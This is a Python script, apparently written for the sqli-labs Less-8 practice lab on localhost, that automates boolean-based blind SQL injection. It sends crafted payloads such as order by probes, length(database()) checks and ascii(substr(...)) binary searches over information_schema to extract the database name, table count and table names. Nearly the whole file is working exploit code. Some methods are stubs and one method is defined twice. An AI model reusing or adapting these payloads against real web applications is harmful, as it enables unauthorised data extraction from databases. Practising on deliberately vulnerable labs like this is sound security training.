sql盲注脚本

# moddemod
# 2019/6/13
# 8:23
# PyCharm

import requests
import re
"""
base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1"
"""
base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1"

class Blind(object):

    def __init__(self, base_url):
        self.base_url = base_url
        self.len_database = 0
        self.filed_number = 0
        self.database_name = ""
        self.char = ""
        self.tables_number = 0
        self.tables_name = ""
        self.table_length = 0



    def request(self, payload):
        # print(base_url+payload)
        response = requests.get(url=base_url + payload).text
        pattern = re.compile(r'You are in\.\.\.\.\.\.\.\.\.\.\.')
        result = re.search(pattern=pattern, string=response)
        if result:
            return 1
        else:
            return 0

    def get_field_number(self):
        """
        获取字段数
        http://127.0.0.1/sqli-labs/Less-8/?id=1' order by 3-- +
        :return:
        """
        field_number = 0
        for i in range(1, 10):
            payload = '\' order by {0}-- +'.format(i)
            # url = self.base_url + payload
            r = self.request(payload)
            if r == 0:
                field_number = i
                break
        return field_number - 1


    def get_version(self):
        """
        获取数据库版本号
        http://127.0.0.1/sqli-labs/Less-8/?id=1' order by 3-- +
        :return:
        """
        pass

    def get_user(self):
        """
        获取数据库当前登录的账户
        :return:
        """
        pass

    def get_databases(self):
        """
        获取当前数据库名
        http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),{0},1))={1} %23
        http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())=8-- +
        :return:
        """

        for i in range(1, 10):
            payload = "' and length(database())={0}-- +".format(i)
            r = self.request(payload)
            if r:
                self.len_database = i
                for j in range(1, self.len_database + 1):
                    # payload = "' and ascii(substr((select database()),{0},1))>1-- +".format(j)
                    # if self.request(payload) == 0:
                    #     return
                    # print(self.dichotomy(j, 65, 127))
                    self.dichotomy(j, 65, 127)
                    # return self.database_name

    def dichotomy(self, n, min, max):
        """
        大写区间65 - 91
        还是小写区间97 - 123
        payload = "' and ascii(substr((select database()),{0},1))={1}-- +"
        :param n:
        :return:
        """

        if max - min == 1:
            self.char = chr(max)
            self.database_name += self.char
            print(self.database_name)
            return self.database_name

        number = int((max + min) / 2)
        payload = "' and ascii(substr((select database()),{0},1))>{1}-- +".format(n, number)
        r = self.request(payload)
        if r:
            self.dichotomy(n, number, max)
        else:
            self.dichotomy(n, min, number)


    def is_true(self, n):
        if self.dichotomy(n, 65, 91):
            return self.dichotomy(n, 65, 91)
        else:
            return self.dichotomy(n, 97, 123)


    def dichotomy_tables(self,num, n, min, max):
        """
        大写区间65 - 91
        还是小写区间97 - 123
        payload = "' and ascii(substr((select database()),{0},1))={1}-- +"
        :param n:
        :return:
        """

        if max - min == 1:
            self.char = chr(max)
            self.tables_name += self.char
            print(self.tables_name)
            return


        number = int((max + min) / 2)
        payload = " 'and  ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479  limit {0},1),{1},1))>{2} -- +".format(num, n, number)
        r = self.request(payload)
        if r:
            self.dichotomy_tables(num, n, number, max)
        else:
            self.dichotomy_tables(num, n, min, number)


    def get_tables(self):
        """
        获取数据表
        http://127.0.0.1/sqli-labs/Less-8/?id=1%27and%20(select%20count(*)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20)%3E5%20%23
        'and  ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479  limit 0,1),1,1))>100 %23
        'and length((select table_name from information_schema.tables where table_schema=0x7365637572697479%20 limit 0,1))=6-- +
        :return:
        """
        for i in range(10):
            payload = "' and (select count(*) from information_schema.tables where table_schema=0x7365637572697479 ) = {} -- +".format(i)
            if self.request(payload):
                self.tables_number = i
                break
        for i in range(self.tables_number):
            for j in range(10):
                payload = "'and length((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit {0},1))={1}-- +".format(i, j)
                if self.request(payload):
                    print("第%d个表有%d长" %(i+1, j))
                    self.table_length = j

                    for k in range(1, self.table_length + 1):
                        self.dichotomy_tables(i, k, 65, 123)
                    self.tables_name = ""
                    break


    def is_true(self, n):
        if self.dichotomy(n, 65, 91):
            return self.dichotomy(n, 65, 91)
        else:
            return self.dichotomy(n, 97, 123)


def test():
    mod = Blind(base_url="http://127.0.0.1/sqli-labs/Less-8/?id=1")
    # mod.get_databases()
    # mod.get_tables()
    mod.get_tables()
    # print(mod.database_name)

test()